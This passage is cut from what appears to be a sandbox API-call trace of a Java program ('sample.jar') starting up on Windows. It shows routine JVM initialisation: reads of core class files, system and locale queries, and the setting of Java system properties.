(in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x131e, lpNumberOfBytesRead=0x208d2c0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d2c0*=0x131e, lpOverlapped=0x0) returned 1 [0093.572] free (_Block=0x121d7ee0) [0093.573] free (_Block=0x121d9c10) [0093.590] malloc (_Size=0x48) returned 0x121d9030 [0093.590] malloc (_Size=0xa0) returned 0x1220a520 [0093.590] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d508, lpNewFilePointer=0x208ce80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce80*=54646024) returned 1 [0093.590] ReadFile (in: hFile=0x134, lpBuffer=0x1220a520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce50, lpOverlapped=0x0 | out: lpBuffer=0x1220a520*, lpNumberOfBytesRead=0x208ce50*=0xa0, lpOverlapped=0x0) returned 1 [0093.590] malloc (_Size=0x20) returned 0x121d7f40 [0093.591] free (_Block=0x1220a520) [0093.591] strlen (_Str="java/util/Hashtable$Entry.class") returned 0x1f [0093.591] strcpy (in: _Dest=0x208d000, _Source="java/util/Hashtable$Entry.class" | out: _Dest="java/util/Hashtable$Entry.class") returned="java/util/Hashtable$Entry.class" [0093.591] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c6c4f, lpNewFilePointer=0x208ca80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca80*=52194383) returned 1 [0093.591] ReadFile (in: hFile=0x134, lpBuffer=0x208cad0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca50, lpOverlapped=0x0 | out: lpBuffer=0x208cad0*, lpNumberOfBytesRead=0x208ca50*=0x1e, lpOverlapped=0x0) returned 1 [0093.591] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c6c8c, lpNewFilePointer=0x208cae0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cae0*=52194444) returned 1 [0093.591] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x6da, lpNumberOfBytesRead=0x208cab0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208cab0*=0x6da, lpOverlapped=0x0) returned 1 [0093.592] free (_Block=0x121d71c0) [0093.592] free (_Block=0x121d8fe0) [0093.597] strlen (_Str="java/lang/Math.class") returned 0x14 [0093.597] malloc (_Size=0x48) returned 0x121d98f0 [0093.597] malloc (_Size=0xa0) returned 0x1220a520 [0093.597] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d47f, lpNewFilePointer=0x208cbc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cbc0*=54645887) returned 1 [0093.598] ReadFile (in: hFile=0x134, lpBuffer=0x1220a520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cb90, lpOverlapped=0x0 | out: lpBuffer=0x1220a520*, lpNumberOfBytesRead=0x208cb90*=0xa0, lpOverlapped=0x0) returned 1 [0093.598] malloc (_Size=0x15) returned 0x121d71c0 [0093.598] free (_Block=0x1220a520) [0093.598] strlen (_Str="java/lang/Math.class") returned 0x14 [0093.598] strcpy (in: _Dest=0x208cd40, _Source="java/lang/Math.class" | out: _Dest="java/lang/Math.class") returned="java/lang/Math.class" [0093.598] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c4307, lpNewFilePointer=0x208c7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7c0*=52183815) returned 1 [0093.598] ReadFile (in: hFile=0x134, lpBuffer=0x208c810, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c790, lpOverlapped=0x0 | out: lpBuffer=0x208c810*, lpNumberOfBytesRead=0x208c790*=0x1e, lpOverlapped=0x0) returned 1 [0093.637] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c4339, lpNewFilePointer=0x208c820, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c820*=52183865) returned 1 [0093.637] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1ac3, lpNumberOfBytesRead=0x208c7f0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c7f0*=0x1ac3, lpOverlapped=0x0) returned 1 [0093.638] free (_Block=0x121d7f40) [0093.638] free (_Block=0x121d9030) [0093.670] GetModuleHandleA (lpModuleName="jvm.dll") returned 0x6f540000 [0093.671] GetProcAddress (hModule=0x6f540000, lpProcName="JVM_GetVersionInfo") returned 0x6f6c5b60 [0093.679] strlen (_Str="java/lang/ref/Finalizer$FinalizerThread.class") returned 0x2d [0093.679] malloc (_Size=0x48) returned 0x121d8fe0 [0093.679] malloc (_Size=0xa0) returned 0x1220ae70 [0093.679] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d594, lpNewFilePointer=0x208e5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5e0*=54646164) returned 1 [0093.679] ReadFile (in: hFile=0x134, lpBuffer=0x1220ae70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e5b0, lpOverlapped=0x0 | out: lpBuffer=0x1220ae70*, lpNumberOfBytesRead=0x208e5b0*=0xa0, lpOverlapped=0x0) returned 1 [0093.679] malloc (_Size=0x2e) returned 0x121d9f30 [0093.679] free (_Block=0x1220ae70) [0093.680] strlen (_Str="java/lang/ref/Finalizer$FinalizerThread.class") returned 0x2d [0093.680] strcpy (in: _Dest=0x208e760, _Source="java/lang/ref/Finalizer$FinalizerThread.class" | out: _Dest="java/lang/ref/Finalizer$FinalizerThread.class") returned="java/lang/ref/Finalizer$FinalizerThread.class" [0093.680] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c86b3, lpNewFilePointer=0x208e1e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1e0*=52201139) returned 1 [0093.680] ReadFile (in: hFile=0x134, lpBuffer=0x208e230, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e1b0, lpOverlapped=0x0 | out: lpBuffer=0x208e230*, lpNumberOfBytesRead=0x208e1b0*=0x1e, lpOverlapped=0x0) returned 1 [0093.680] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c86fe, lpNewFilePointer=0x208e240, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e240*=52201214) returned 1 [0093.680] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x3ae, lpNumberOfBytesRead=0x208e210, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e210*=0x3ae, lpOverlapped=0x0) returned 1 [0093.680] free (_Block=0x121d71c0) [0093.681] free (_Block=0x121d98f0) [0093.693] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x208f3c0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0093.693] _wgetenv (_VarName="JAVA2D_FONTPATH") returned 0x0 [0093.694] GetVersionExA (in: lpVersionInformation=0x208f2b0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x2101000, dwBuildNumber=0x0, dwPlatformId=0xffffffff, szCSDVersion="") | out: lpVersionInformation=0x208f2b0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0093.694] GetNativeSystemInfo (in: lpSystemInfo=0x208f280 | out: lpSystemInfo=0x208f280*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0093.694] strlen (_Str="\\kernel32.dll") returned 0xd [0093.694] GetSystemDirectoryW (in: lpBuffer=0x208f3c0, uSize=0xf6 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0093.694] wcsncat (in: _Dest=0x208f3c0, _Source="\\kernel32.dll", _Count=0xf1 | out: _Dest="C:\\Windows\\system32\\kernel32.dll") returned="C:\\Windows\\system32\\kernel32.dll" [0093.694] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\kernel32.dll", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x73c [0093.946] malloc (_Size=0x73c) returned 0x1220c8c0 [0093.946] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\kernel32.dll", dwHandle=0x0, dwLen=0x73c, lpData=0x1220c8c0 | out: lpData=0x1220c8c0) returned 1 [0093.947] VerQueryValueW (in: pBlock=0x1220c8c0, lpSubBlock="\\", lplpBuffer=0x208f278, puLen=0x208f270 | out: lplpBuffer=0x208f278*=0x1220c8e8, puLen=0x208f270) returned 1 [0093.947] free (_Block=0x1220c8c0) [0093.948] sprintf (in: _Dest=0x208f350, _Format="%d.%d" | out: _Dest="10.0") returned 4 [0093.948] GetSystemInfo (in: lpSystemInfo=0x208f200 | out: lpSystemInfo=0x208f200*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0093.948] _wgetenv (_VarName="USERNAME") returned="RDhJ0CNFevzX" [0093.948] wcslen (_String="RDhJ0CNFevzX") returned 0xc [0093.948] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x7ffb5f2d0000 [0094.007] GetProcAddress (hModule=0x7ffb5f2d0000, lpProcName="SHGetKnownFolderPath") returned 0x7ffb5f3704c0 [0094.008] SHGetKnownFolderPath (in: rfid=0x6f51cba0, param_2=0x4000, hToken=0x0, ppszPath=0x6f525590 | out: ppszPath=0x6f525590*="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0094.013] GetUserDefaultLCID () returned 0x409 [0094.014] GetSystemDefaultLCID () returned 0x409 [0094.014] GetUserDefaultUILanguage () returned 0x409 [0094.014] malloc (_Size=0x9) returned 0x1220c680 [0094.014] GetLocaleInfoA (in: Locale=0x409, LCType=0x5c, lpLCData=0x208f190, cchData=86 | out: lpLCData="en-US") returned 6 [0094.014] strlen (_Str="U") returned 0x1 [0094.014] malloc (_Size=0x9) returned 0x1220c980 [0094.014] GetLocaleInfoA (in: Locale=0x409, LCType=0x5a, lpLCData=0x1220c980, cchData=9 | out: lpLCData="US") returned 3 [0094.015] malloc (_Size=0x9) returned 0x1220c920 [0094.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x59, lpLCData=0x1220c920, cchData=9 | out: lpLCData="en") returned 3 [0094.015] malloc (_Size=0x9) returned 0x1220cca0 [0094.015] strcmp (_Str1="en", _Str2="nb") returned -1 [0094.015] strcmp (_Str1="en", _Str2="nn") returned -1 [0094.015] malloc (_Size=0x10) returned 0x1220ccc0 [0094.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x1220ccc2, cchData=14 | out: lpLCData="1252") returned 5 [0094.015] atoi (_Str="1252") returned 1252 [0094.015] strcmp (_Str1="Cp1252", _Str2="MS950") returned -1 [0094.015] strcmp (_Str1="Cp1252", _Str2="GBK") returned -1 [0094.015] malloc (_Size=0x9) returned 0x1220caa0 [0094.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x5c, lpLCData=0x208f190, cchData=86 | out: lpLCData="en-US") returned 6 [0094.015] strlen (_Str="U") returned 0x1 [0094.015] malloc (_Size=0x9) returned 0x1220cce0 [0094.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x5a, lpLCData=0x1220cce0, cchData=9 | out: lpLCData="US") returned 3 [0094.015] malloc (_Size=0x9) returned 0x1220cd00 [0094.015] GetLocaleInfoA (in: Locale=0x409, LCType=0x59, lpLCData=0x1220cd00, cchData=9 | out: lpLCData="en") returned 3 [0094.016] malloc (_Size=0x9) returned 0x1220cba0 [0094.016] strcmp (_Str1="en", _Str2="nb") returned -1 [0094.016] strcmp (_Str1="en", _Str2="nn") returned -1 [0094.016] malloc (_Size=0x10) returned 0x1220c6a0 [0094.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x1220c6a2, cchData=14 | out: lpLCData="1252") returned 5 [0094.016] atoi (_Str="1252") returned 1252 [0094.016] strcmp (_Str1="Cp1252", _Str2="MS950") returned -1 [0094.016] strcmp (_Str1="Cp1252", _Str2="GBK") returned -1 [0094.016] malloc (_Size=0x9) returned 0x1220cd60 [0094.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x5c, lpLCData=0x208f190, cchData=86 | out: lpLCData="en-US") returned 6 [0094.016] strlen (_Str="U") returned 0x1 [0094.016] malloc (_Size=0x9) returned 0x1220c880 [0094.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x5a, lpLCData=0x1220c880, cchData=9 | out: lpLCData="US") returned 3 [0094.016] malloc (_Size=0x9) returned 0x1220c6c0 [0094.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x59, lpLCData=0x1220c6c0, cchData=9 | out: lpLCData="en") returned 3 [0094.016] malloc (_Size=0x9) returned 0x1220cb40 [0094.016] strcmp (_Str1="en", _Str2="nb") returned -1 [0094.016] strcmp (_Str1="en", _Str2="nn") returned -1 [0094.016] malloc (_Size=0x10) returned 0x1220cd80 [0094.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x1220cd82, cchData=14 | out: lpLCData="1252") returned 5 [0094.016] atoi (_Str="1252") returned 1252 [0094.016] strcmp (_Str1="Cp1252", _Str2="MS950") returned -1 [0094.016] strcmp (_Str1="Cp1252", _Str2="GBK") returned -1 [0094.016] malloc (_Size=0x10) returned 0x1220cd20 [0094.016] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x1220cd22, cchData=14 | out: lpLCData="1252") returned 5 [0094.016] atoi (_Str="1252") returned 1252 [0094.016] strcmp (_Str1="Cp1252", _Str2="MS950") returned -1 [0094.017] strcmp (_Str1="Cp1252", _Str2="GBK") returned -1 [0094.017] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0094.017] GetFileType (hFile=0x24) returned 0x2 [0094.017] malloc (_Size=0x10) returned 0x1220c8c0 [0094.017] GetConsoleCP () returned 0x1b5 [0094.017] sprintf (in: _Dest=0x1220c8c0, _Format="cp%d" | out: _Dest="cp437") returned 5 [0094.017] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0094.017] GetFileType (hFile=0x28) returned 0x2 [0094.017] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x208f3c0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0094.032] wcslen (_String="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0094.032] wcslen (_String="RDhJ0CNFevzX") returned 0xc [0094.032] wcslen (_String="C:\\Users\\RDhJ0CNFevzX") returned 0x15 [0094.034] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0094.035] GetModuleHandleA (lpModuleName="jvm") returned 0x6f540000 [0094.035] malloc (_Size=0x104) returned 0x1220cf40 [0094.035] GetModuleFileNameA (in: hModule=0x6f540000, lpFilename=0x1220cf40, nSize=0x104 | out: lpFilename="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\server\\jvm.dll")) returned 0x35 [0094.036] strlen (_Str="kernel") returned 0x6 [0094.036] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\server") returned 0x2d [0094.036] strcmp (_Str1="kernel", _Str2="server") returned -1 [0094.036] free (_Block=0x1220cf40) [0094.239] strcmp (_Str1="Cp1252", _Str2="8859_1") returned 1 [0094.240] strcmp (_Str1="Cp1252", _Str2="ISO8859-1") returned -1 [0094.240] strcmp (_Str1="Cp1252", _Str2="ISO8859_1") returned -1 [0094.240] strcmp (_Str1="Cp1252", _Str2="ISO646-US") returned -1 [0094.240] strcmp (_Str1="Cp1252", _Str2="Cp1252") returned 0 [0094.241] strlen (_Str="user.language") returned 0xd [0094.241] strlen (_Str="user.script") returned 0xb [0094.241] strlen (_Str="user.country") returned 0xc [0094.242] strlen (_Str="user.variant") returned 0xc [0094.242] strlen (_Str="file.encoding") returned 0xd [0094.243] strlen (_Str="java.vm.specification.name") returned 0x1a [0094.243] strlen (_Str="Java Virtual Machine Specification") returned 0x22 [0094.243] strlen (_Str="java.vm.version") returned 0xf [0094.243] strlen (_Str="25.171-b11") returned 0xa [0094.243] strlen (_Str="java.vm.name") returned 0xc [0094.243] strlen (_Str="Java HotSpot(TM) 64-Bit Server VM") returned 0x21 [0094.243] strlen (_Str="java.vm.info") returned 0xc [0094.244] strlen (_Str="mixed mode, sharing") returned 0x13 [0094.244] strlen (_Str="java.ext.dirs") returned 0xd [0094.244] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext;C:\\Windows\\Sun\\Java\\lib\\ext") returned 0x46 [0094.244] strlen (_Str="java.endorsed.dirs") returned 0x12 [0094.244] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\endorsed") returned 0x2f [0094.244] strlen (_Str="sun.boot.library.path") returned 0x15 [0094.244] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\bin") returned 0x26 [0094.245] strlen (_Str="java.library.path") returned 0x11 [0094.245] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\bin;C:\\Windows\\Sun\\Java\\bin;C:\\Windows\\system32;C:\\Windows;C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;.") returned 0xfc [0094.245] strlen (_Str="java.home") returned 0x9 [0094.245] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0094.245] strlen (_Str="java.class.path") returned 0xf [0094.245] strlen (_Str="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar") returned 0x24 [0094.245] strlen (_Str="sun.boot.class.path") returned 0x13 [0094.245] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar;C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar;C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar;C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar;C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar;C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar;C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar;C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned 0x185 [0094.246] strlen (_Str="java.vm.specification.vendor") returned 0x1c [0094.246] strlen (_Str="Oracle Corporation") returned 0x12 [0094.246] strlen (_Str="java.vm.specification.version") returned 0x1d [0094.246] strlen (_Str="1.8") returned 0x3 [0094.246] strlen (_Str="java.vm.vendor") returned 0xe [0094.246] strlen (_Str="Oracle Corporation") returned 0x12 [0094.246] strlen (_Str="sun.java.command") returned 0x10 [0094.246] strlen (_Str="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar") returned 0x24 [0094.247] strlen (_Str="sun.java.launcher") returned 0x11 [0094.247] strlen (_Str="SUN_STANDARD") returned 0xc [0094.247] strlen (_Str="sun.nio.MaxDirectMemorySize") returned 0x1b [0094.247] strlen (_Str="-1") returned 0x2 [0094.247] strlen (_Str="sun.management.compiler") returned 0x17 [0094.248] strlen (_Str="HotSpot 64-Bit Tiered Compilers") returned 0x1f [0094.248] strlen (_Str="sun.cds.enableSharedLookupCache") returned 0x1f [0094.248] strlen (_Str="false") returned 0x5 [0094.248] strlen (_Str="sun.locale.formatasdefault") returned 0x1a [0094.248] strlen (_Str="user.language") returned 0xd [0094.249] strlen (_Str="user.language.display") returned 0x15 [0094.249] strcmp (_Str1="en", _Str2="en") returned 0 [0094.249] strlen (_Str="user.language.format") returned 0x14 [0094.250] strcmp (_Str1="en", _Str2="en") returned 0 [0094.250] strlen (_Str="user.script") returned 0xb [0094.250] strlen (_Str="user.script.display") returned 0x13 [0094.250] strcmp (_Str1="", _Str2="") returned 0 [0094.251] strlen (_Str="user.script.format") returned 0x12 [0094.251] strcmp (_Str1="", _Str2="") returned 0 [0094.251] strlen (_Str="user.country") returned 0xc [0094.251] strlen (_Str="user.country.display") returned 0x14 [0094.252] strcmp (_Str1="US", _Str2="US") returned 0 [0094.252] strlen (_Str="user.country.format") returned 0x13 [0094.252] strcmp (_Str1="US", _Str2="US") returned 0 [0094.252] strlen (_Str="user.variant") returned 0xc [0094.252] strlen (_Str="user.variant.display") returned 0x14 [0094.253] strcmp (_Str1="", _Str2="") returned 0 [0094.253] strlen (_Str="user.variant.format") returned 0x13 [0094.253] strcmp (_Str1="", _Str2="") returned 0 [0094.253] strlen (_Str="file.encoding") returned 0xd [0094.255] strlen (_Str="java/util/Hashtable$EntrySet.class") returned 0x22 [0094.255] malloc (_Size=0x48) returned 0x121d9c60 [0094.255] malloc (_Size=0xa0) returned 0x1220d090 [0094.255] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d42f, lpNewFilePointer=0x208e5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5b0*=54645807) returned 1 [0094.256] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e580, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208e580*=0xa0, lpOverlapped=0x0) returned 1 [0094.256] malloc (_Size=0x23) returned 0x121d8090 [0094.256] free (_Block=0x1220d090) [0094.256] strlen (_Str="java/util/Hashtable$EntrySet.class") returned 0x22 [0094.256] strcpy (in: _Dest=0x208e730, _Source="java/util/Hashtable$EntrySet.class" | out: _Dest="java/util/Hashtable$EntrySet.class") returned="java/util/Hashtable$EntrySet.class" [0094.256] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c3b3e, lpNewFilePointer=0x208e1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1b0*=52181822) returned 1 [0094.257] ReadFile (in: hFile=0x134, lpBuffer=0x208e200, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e180, lpOverlapped=0x0 | out: lpBuffer=0x208e200*, lpNumberOfBytesRead=0x208e180*=0x1e, lpOverlapped=0x0) returned 1 [0094.257] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c3b7e, lpNewFilePointer=0x208e210, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e210*=52181886) returned 1 [0094.257] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x789, lpNumberOfBytesRead=0x208e1e0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e1e0*=0x789, lpOverlapped=0x0) returned 1 [0094.257] free (_Block=0x121d9f30) [0094.258] free (_Block=0x121d8fe0) [0094.266] strlen (_Str="java/util/Collections$SynchronizedSet.class") returned 0x2b [0094.266] malloc (_Size=0x48) returned 0x121d97b0 [0094.266] malloc (_Size=0xa0) returned 0x1220d090 [0094.266] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d1c3, lpNewFilePointer=0x208e550, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e550*=54645187) returned 1 [0094.266] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e520, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208e520*=0xa0, lpOverlapped=0x0) returned 1 [0094.266] malloc (_Size=0x2c) returned 0x121da370 [0094.267] free (_Block=0x1220d090) [0094.267] strlen (_Str="java/util/Collections$SynchronizedSet.class") returned 0x2b [0094.267] strcpy (in: _Dest=0x208e6d0, _Source="java/util/Collections$SynchronizedSet.class" | out: _Dest="java/util/Collections$SynchronizedSet.class") returned="java/util/Collections$SynchronizedSet.class" [0094.267] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ba6ed, lpNewFilePointer=0x208e150, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e150*=52143853) returned 1 [0094.267] ReadFile (in: hFile=0x134, lpBuffer=0x208e1a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e120, lpOverlapped=0x0 | out: lpBuffer=0x208e1a0*, lpNumberOfBytesRead=0x208e120*=0x1e, lpOverlapped=0x0) returned 1 [0094.267] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ba736, lpNewFilePointer=0x208e1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1b0*=52143926) returned 1 [0094.267] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x499, lpNumberOfBytesRead=0x208e180, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e180*=0x499, lpOverlapped=0x0) returned 1 [0094.268] free (_Block=0x121d8090) [0094.268] free (_Block=0x121d9c60) [0094.272] strlen (_Str="java/util/Collections$SynchronizedCollection.class") returned 0x32 [0094.272] malloc (_Size=0x48) returned 0x121d9710 [0094.272] malloc (_Size=0xa0) returned 0x1220d090 [0094.272] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d163, lpNewFilePointer=0x208db10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db10*=54645091) returned 1 [0094.272] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dae0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208dae0*=0xa0, lpOverlapped=0x0) returned 1 [0094.272] malloc (_Size=0x33) returned 0x121daab0 [0094.273] free (_Block=0x1220d090) [0094.273] strlen (_Str="java/util/Collections$SynchronizedCollection.class") returned 0x32 [0094.273] strcpy (in: _Dest=0x208dc90, _Source="java/util/Collections$SynchronizedCollection.class" | out: _Dest="java/util/Collections$SynchronizedCollection.class") returned="java/util/Collections$SynchronizedCollection.class" [0094.273] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b9737, lpNewFilePointer=0x208d710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d710*=52139831) returned 1 [0094.273] ReadFile (in: hFile=0x134, lpBuffer=0x208d760, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d6e0, lpOverlapped=0x0 | out: lpBuffer=0x208d760*, lpNumberOfBytesRead=0x208d6e0*=0x1e, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b9787, lpNewFilePointer=0x208d770, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d770*=52139911) returned 1 [0094.274] ReadFile (in: hFile=0x134, lpBuffer=0x21030a0, nNumberOfBytesToRead=0xf66, lpNumberOfBytesRead=0x208d740, lpOverlapped=0x0 | out: lpBuffer=0x21030a0*, lpNumberOfBytesRead=0x208d740*=0xf66, lpOverlapped=0x0) returned 1 [0094.274] free (_Block=0x121da370) [0094.274] free (_Block=0x121d97b0) [0094.288] strlen (_Str="java/util/Objects.class") returned 0x17 [0094.288] malloc (_Size=0x48) returned 0x121d93f0 [0094.288] malloc (_Size=0xa0) returned 0x1220d090 [0094.288] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d11e, lpNewFilePointer=0x208e1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1b0*=54645022) returned 1 [0094.288] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e180, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208e180*=0xa0, lpOverlapped=0x0) returned 1 [0094.288] malloc (_Size=0x18) returned 0x1220cbe0 [0094.289] free (_Block=0x1220d090) [0094.290] strlen (_Str="java/util/Objects.class") returned 0x17 [0094.290] strcpy (in: _Dest=0x208e330, _Source="java/util/Objects.class" | out: _Dest="java/util/Objects.class") returned="java/util/Objects.class" [0094.290] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b8ef9, lpNewFilePointer=0x208ddb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ddb0*=52137721) returned 1 [0094.290] ReadFile (in: hFile=0x134, lpBuffer=0x208de00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dd80, lpOverlapped=0x0 | out: lpBuffer=0x208de00*, lpNumberOfBytesRead=0x208dd80*=0x1e, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b8f2e, lpNewFilePointer=0x208de10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de10*=52137774) returned 1 [0094.291] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x809, lpNumberOfBytesRead=0x208dde0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208dde0*=0x809, lpOverlapped=0x0) returned 1 [0094.291] free (_Block=0x121daab0) [0094.292] free (_Block=0x121d9710) [0094.316] malloc 